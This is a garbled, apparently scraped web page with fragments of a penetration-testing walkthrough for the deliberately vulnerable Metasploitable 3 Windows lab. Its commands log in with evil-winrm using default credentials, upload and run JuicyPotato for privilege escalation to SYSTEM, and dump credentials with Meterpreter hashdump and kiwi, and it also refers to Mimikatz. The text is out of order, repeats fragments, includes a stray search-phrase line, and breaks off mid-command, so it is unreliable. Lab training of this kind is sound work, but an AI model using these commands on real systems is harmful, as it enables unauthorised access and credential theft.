Skip to content

Metasploitable 3 — Windows Walkthrough

# Install evil-winrm gem install evil-winrm evil-winrm -i 192.168.56.102 -u administrator -p vagrant

upload JuicyPotato.exe C:\temp\ Then run: metasploitable 3 windows walkthrough

Developed by Rapid7 in collaboration with Vagrant, Metasploitable 3 is a deliberately vulnerable Windows machine designed to teach real-world Active Directory exploitation, misconfiguration management, and post-exploitation tactics. This is not a simple "click-and-exploit" box. It requires understanding Windows services, firewall rules, and privilege escalation vectors. # Install evil-winrm gem install evil-winrm evil-winrm -i

Invoke-Command -ScriptBlock { C:\temp\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami > C:\temp\priv.txt" -t * } If successful, SYSTEM. You are now SYSTEM or Administrator . Your mission: Own the forest. Method A: Meterpreter (If you used MSF) meterpreter > hashdump # Or meterpreter > load kiwi meterpreter > creds_all Method B: Mimikatz via PowerShell If you are in a native shell (Evil-WinRM or cmd): Invoke-Command -ScriptBlock { C:\temp\JuicyPotato